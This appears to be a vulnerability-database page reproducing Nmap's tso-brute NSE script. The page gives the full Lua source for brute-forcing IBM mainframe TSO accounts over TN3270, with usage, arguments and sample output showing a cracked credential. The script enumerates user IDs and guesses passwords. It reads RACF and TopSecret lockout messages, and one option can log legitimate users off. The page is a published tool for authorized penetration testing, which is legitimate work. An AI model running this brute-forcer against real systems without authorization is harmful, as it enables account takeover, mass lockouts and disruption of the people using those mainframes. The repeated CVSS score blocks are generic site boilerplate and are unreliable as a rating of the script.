Lucene search

K
nmapNmap.orgNMAP:TSO-BRUTE.NSE
HistoryDec 08, 2016 - 9:17 p.m.

tso-brute NSE Script

2016-12-0821:17:53
nmap.org
nmap.org
112

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

10 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

0.973 High

EPSS

Percentile

99.8%

TSO account brute forcer.

This script relies on the NSE TN3270 library which emulates a TN3270 screen for NMAP.

TSO user IDs have the following rules: - it cannot begin with a number - only contains alpha-numeric characters and @, #, $. - it cannot be longer than 7 chars

Script Arguments

tso-brute.commands

Commands in a semi-colon separated list needed to access TSO. Defaults to TSO.

tso-brute.always_logon

TSO logon can kick a user off if it guesses the correct password. always_logon, when set to true, will logon, even if the user is logged in (kicking that user off). The default, false will skip that account.

brute.credfile, brute.delay, brute.emptypass, brute.firstonly, brute.guesses, brute.mode, brute.passonly, brute.retries, brute.start, brute.threads, brute.unique, brute.useraspass

See the documentation for the brute library.

creds.[service], creds.global

See the documentation for the creds library.

passdb, unpwdb.passlimit, unpwdb.timelimit, unpwdb.userlimit, userdb

See the documentation for the unpwdb library.

Example Usage

nmap -p 2401 --script tso-brute <host>

Script Output

23/tcp open  tn3270  syn-ack IBM Telnet TN3270
| tso-brute:
|   Node Name:
|     IBMUSER:<skipped> - User logged on. Skipped.
|     ZERO:<skipped> - User logged on. Skipped.
|     COOL:secret - Valid credentials
|_  Statistics: Performed 6 guesses in 6 seconds, average tps: 1
Final times for host: srtt: 96305 rttvar: 72303  to: 385517

Requires


local stdnse    = require "stdnse"
local shortport = require "shortport"
local tn3270    = require "tn3270"
local brute     = require "brute"
local creds     = require "creds"
local unpwdb    = require "unpwdb"
local nmap = require "nmap"
local string = require "string"
local stringaux = require "stringaux"

description = [[
TSO account brute forcer.

This script relies on the NSE TN3270 library which emulates a
TN3270 screen for NMAP.

TSO user IDs have the following rules:
 - it cannot begin with a number
 - only contains alpha-numeric characters and @, #, $.
 - it cannot be longer than 7 chars
]]

---
-- @usage
-- nmap -p 2401 --script tso-brute <host>
--
-- @output
-- 23/tcp open  tn3270  syn-ack IBM Telnet TN3270
-- | tso-brute:
-- |   Node Name:
-- |     IBMUSER:<skipped> - User logged on. Skipped.
-- |     ZERO:<skipped> - User logged on. Skipped.
-- |     COOL:secret - Valid credentials
-- |_  Statistics: Performed 6 guesses in 6 seconds, average tps: 1
-- Final times for host: srtt: 96305 rttvar: 72303  to: 385517
--
-- @args tso-brute.commands Commands in a semi-colon separated list needed
--       to access TSO. Defaults to <code>TSO</code>.
--
-- @args tso-brute.always_logon TSO logon can kick a user off if it guesses
--       the correct password. always_logon, when set to <code>true</code>, will logon, even if
--       the user is logged in (kicking that user off). The default, <code>false</code> will
--       skip that account.
--
-- @changelog
-- 2015-10-29 - v0.1 - created by Soldier of Fortran
--
-- @author Philip Young
-- @copyright Same as Nmap--See https://nmap.org/book/man-legal.html
--

author = "Soldier of Fortran"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"intrusive"}

portrule = shortport.port_or_service({23,992,623}, {"tn3270"})

--- Registers User IDs that no longer need to be tested
--
-- @param username to stop checking
local function register_invalid( username )
  if nmap.registry.tsoinvalid == nil then
    nmap.registry.tsoinvalid = {}
  end
  stdnse.debug(2,"Registering %s", username)
  nmap.registry.tsoinvalid[username] = true
end

Driver = {
  new = function(self, host, port, options)
    local o = {}
    setmetatable(o, self)
    self.__index = self
    o.host = host
    o.port = port
    o.options = options
    o.tn3270 = tn3270.Telnet:new(brute.new_socket())
    o.tn3270:disable_tn3270e()
    return o
  end,
  connect = function( self )
    local status, err = self.tn3270:initiate(self.host,self.port)
    self.tn3270:get_screen_debug(2)
    if not status then
      stdnse.debug("Could not initiate TN3270: %s", err )
      return false
    end
    return true
  end,
  disconnect = function( self )
    self.tn3270:disconnect()
    self.tn3270 = nil
    return true
  end,
  login = function (self, user, pass)

    local commands = self.options['key1']
    local always_logon = self.options['key2']
    local skip = self.options['skip']
    stdnse.debug(2,"Getting to TSO")
    local run = stringaux.strsplit(";%s*", commands)
    stdnse.verbose(2,"Trying User ID/Password: %s/%s", user, pass)
    for i = 1, #run do
      stdnse.debug(2,"Issuing Command (#%s of %s): %s", i, #run ,run[i])
      if i == #run and run[i]:upper():find("LOGON APPLID") and skip then
        stdnse.debug(2,"Trying User ID: %s", user)
        self.tn3270:send_cursor(run[i] .. " DATA(" .. user .. ")")
      elseif i == #run and skip then
        stdnse.debug(2,"Trying User ID: %s", user)
        self.tn3270:send_cursor(run[i] .. " " .. user)
      else
        self.tn3270:send_cursor(run[i])
      end
      self.tn3270:get_all_data()
    end

    if self.tn3270:find("%*%*%*") then -- For ACF2/TopSecret if required
      self.tn3270:send_enter()
      self.tn3270:get_all_data()
    end

    if not self.tn3270:find("ENTER USERID")
       and not self.tn3270:find("TSO/E LOGON")
       and not self.tn3270:find("IKJ56710I INVALID USERID") then
      local err = brute.Error:new( "TSO Unavailable" )
        -- This error occurs on too many concurrent application requests it
        -- should be temporary. We use the new setReduce function.
      err:setReduce(true)
      stdnse.debug(1,"TSO Unavailable for UserID %s", pass )
      return false, err
    end

    if not skip then
      stdnse.debug(2,"Trying User ID: %s", user)
      self.tn3270:send_cursor(user)
      self.tn3270:get_all_data()
    end


    stdnse.debug(2,"Screen Received for User ID: %s", user)
    self.tn3270:get_screen_debug(2)

    if not self.tn3270:find('Enter LOGON parameters below') then
      stdnse.debug(2,"Screen Received for User ID: %s", user)
      self.tn3270:get_screen_debug(2)
        -- This error occurs on too many concurrent application requests it
        -- should be temporary. We use the new setReduce function.
      local err = brute.Error:new( "Not at TSO" )
      err:setReduce(true)
      stdnse.debug(1,"TSO Unavailable for UserID %s", pass )
      return false, err
    end

    if self.tn3270:find('not authorized to use TSO') then -- invalid user ID
      stdnse.debug(2,"Got Message: IKJ56420I Userid %s not authorized to use TSO.", user)
      -- Store the invalid ID in the registry so we don't keep trying it with subsequent passwords
      -- when using the brute library.
      register_invalid(user)
      return false,  brute.Error:new( "User ID not authorized to use TSO" )
    else
      -- It's a valid account so lets try a password
      stdnse.debug(2,"%s is a valid TSO User ID. Trying Password: %s", string.upper(user), pass)
      if always_logon then
        local writeable = self.tn3270:writeable()
        -- This turns on the 'reconnect' which may boot users off
        self.tn3270:send_locations({{writeable[1][1],pass},{writeable[11][1],"S"}})
      else
        self.tn3270:send_cursor(pass)
      end

      self.tn3270:get_all_data()
      while self.tn3270:isClear() do
        -- the screen is blank for a few while it loads TSO
        self.tn3270:get_all_data()
      end

      stdnse.debug(2,"Screen Received for User/Pass: %s/%s", user, pass)
      self.tn3270:get_screen_debug(2)

      if not always_logon and self.tn3270:find("already logged on") then
        -- IKJ56425I LOGON rejected User already logged on to system
        register_invalid(user)
        return true, creds.Account:new(user, "<skipped>", "User logged on. Skipped.")
      elseif (self.tn3270:find("IKJ56425I") and self.tn3270:find("IKJ56418I")) then
        -- IKJ56425I LOGON REJECTED, RACF® TEMPORARILY REVOKING USER ACCESS
        -- IKJ56418I CONTACT YOUR TSO ADMINISTRATOR
        -- The first message (5I) is always followed by the second if the account it revoked
        -- But not followed by the second message if its just logged on already
        register_invalid(user) -- We dont want to keep generating errors
        stdnse.verbose(3,"User: " .. user .. " LOCKED OUT")
        return false, brute.Error:new("Account Locked out")
      elseif not (self.tn3270:find("IKJ56421I") or
          self.tn3270:find("IKJ56443I") or
          self.tn3270:find("TSS7101E")  or
          self.tn3270:find("TSS714[0-3]E")  or
          self.tn3270:find("TSS7099E") or
          self.tn3270:find("TSS7120E")) then
        -- RACF:
        -- IKJ56421I PASSWORD NOT AUTHORIZED FOR USERID
        -- IKJ56443I TSOLOGON RECONNECT REJECTED - USER ACCESS REVOKED BY RACF

        -- Top Secret:
        -- TSS7101E Password is Incorrect
        -- TSS7140E Accessor ID Has Expired: No Longer Valid
        -- TSS7141E Use of Accessor ID Suspended
        -- TSS7142E Accessor ID Not Yet Available for Use - Still Inactive
        -- TSS7143E Accessor ID Has Been Inactive Too Long
        -- TSS7120E PASSWORD VIOLATION THRESHOLD EXCEEDED
        -- TSS7099E Signon credentials invalid

        -- The 'MSG allows testers to discern any relevant messages they may get for the account'
        stdnse.verbose(2,"Valid User/Pass: " .. user .. "/" .. pass)
        stdnse.verbose(3,"Valid MSG for " .. user .. "/" .. pass .. ": " .. self.tn3270:get_screen():sub(1,80))
        return true, creds.Account:new(user, pass, creds.State.VALID)
      else
        return false, brute.Error:new( "Incorrect password" )
      end
    end
  end
}

--- Tests the target to see if we can even get to TSO
--
-- @param host host NSE object
-- @param port port NSE object
-- @param commands script-args of commands to use to get to TSO
-- @return status true on success, false on failure
-- @return name of security product installed
local function tso_test( host, port, commands )
  stdnse.debug("Checking for TSO")
  local tn = tn3270.Telnet:new()
  tn:disable_tn3270e()
  local status, err = tn:initiate(host,port)
  local tso = false -- initially we're not at TSO logon panel
  local secprod = "RACF"
  tn:get_screen_debug(2) -- prints TN3270 screen to debug
  if not status then
    stdnse.debug("Could not initiate TN3270: %s", err )
    return tso, "Could not Initiate TN3270"
  end
  local run = stringaux.strsplit(";%s*", commands)
  for i = 1, #run do
    stdnse.debug(2,"Issuing Command (#%s of %s): %s", i, #run ,run[i])
    tn:send_cursor(run[i])
    tn:get_all_data()
  end
  tn:get_screen_debug(2)

  if tn:find("***") then
    secprod = "TopSecret/ACF2"
  end

  if tn:find("ENTER USERID") or tn:find("TSO/E LOGON")  then
    tso = true
    -- Patch OA44855 removed the ability to enumerate users
    tn:send_cursor("notreal")
    tn:get_all_data()
    if tn:find("IKJ56476I ENTER PASSWORD") then
      return false, secprod, "Enumeration is not possible. PASSWORDPREPROMPT is set to ON."
    end
  end
  tn:send_pf(3)
  tn:disconnect()
  return tso, secprod, "Could not get to TSO. Try --script-args=tso-brute.commands='logon applid(tso)'. Aborting."
end

--- Tests the target to see if we can speed up brute forcing
-- VTAM/USSTable will sometimes allow you to put the userid
-- in the command area either through data() or just adding
-- the userid. This function will test for both
--
-- @param host host NSE object
-- @param port port NSE object
-- @param commands script-args of commands to use to get to TSO
-- @return status true on success, false on failure
local function tso_skip( host, port, commands )
  stdnse.debug("Checking for IKJ56700A message skip")
  local tn = tn3270.Telnet:new()
  tn:disable_tn3270e()
  stdnse.debug2("Connecting TN3270 to %s:%s", host.targetname or host.ip, port.number)
  local status, err = tn:initiate(host,port)
  stdnse.debug2("Displaying initial TN3270 Screen:")
  tn:get_screen_debug(2) -- prints TN3270 screen to debug
  if not status then
    stdnse.debug("Could not initiate TN3270: %s", err )
    return false
  end
  -- We're connected now to test.
  local data = false
  if commands:upper():find('LOGON APPLID') then
    stdnse.debug(2,"Using LOGON command (%s) trying DATA() command", commands )
    data = true
  else
    stdnse.debug(2,"Not using LOGON command, testing adding userid to command" )
  end

  local run = stringaux.strsplit(";%s*", commands)
  for i = 1, #run do
    stdnse.debug(2,"Issuing Command (#%s of %s): %s", i, #run ,run[i])
    if i == #run then
      if data then
        stdnse.debug(2,"Sending "..run[i].." DATA(FAKEUSER)")
        tn:send_cursor(run[i].." DATA(FAKEUSER)")
      else
        stdnse.debug(2,"Sending "..run[i].." FAKEUSER")
        tn:send_cursor(run[i].." FAKEUSER")
      end
    else
      tn:send_cursor(run[i])
    end
    tn:get_all_data()
  end
  tn:get_screen_debug(2)

  if tn:find("IKJ56710I INVALID USERID")     or
     tn:find("Enter LOGON parameters below") then
    stdnse.debug('IKJ56700A message skip supported')
    return true
  else
    return false
  end
end

-- Filter iterator for unpwdb usernames
-- TSO is limited to 7 alpha numeric and @, #, $ and can't start with a number
-- If this user ID has been confirmed to not be a valid TSO account
-- it will stop being passed to the brute engine
-- pattern:
--  ^%D     = The first char must NOT be a digit
-- [%w@#%$] = All letters including the special chars @, #, and $.
local valid_name = function(x)
  if  nmap.registry.tsoinvalid and nmap.registry.tsoinvalid[x] then
    return false
  else
    return (string.len(x) <= 7 and string.match(x,"^%D+[%w@#%$]"))
  end
end

-- Checks string to see if it follows valid password limitations
local valid_pass = function(x)
  local patt = "[%w@#%$]"
  return (string.len(x) <= 8 and string.match(x,patt))
end

action = function( host, port )
  local status, result
  local commands = stdnse.get_script_args(SCRIPT_NAME .. '.commands') or "tso"
  -- if a user is logged on this script will not try to logon as that user
  -- because a user is only allowed to logon from one location. If you turn always_logon on
  -- it will logon if it finds a valid username/password, kicking that user off
  local always_logon = stdnse.get_script_args(SCRIPT_NAME .. '.always_logon') or false
  local tsotst, secprod, err = tso_test(host, port, commands)
  if tsotst then
    stdnse.debug("Starting TSO Brute Force")
    local options = { key1 = commands, key2 = always_logon, skip = tso_skip(host, port, commands) }
    local engine = brute.Engine:new(Driver, host, port, options)
    -- TSO has username/password restrictions.
    -- This sets the iterators to use only valid TSO userids/passwords
    engine:setUsernameIterator(unpwdb.filter_iterator(brute.usernames_iterator(),valid_name))
    engine:setPasswordIterator(unpwdb.filter_iterator(brute.passwords_iterator(),valid_pass))
    engine.options.script_name = SCRIPT_NAME
    engine.options:setTitle("TSO Accounts")
    status, result = engine:start()
    return result
  else
   return err
  end
end

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

10 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

0.973 High

EPSS

Percentile

99.8%

Related for NMAP:TSO-BRUTE.NSE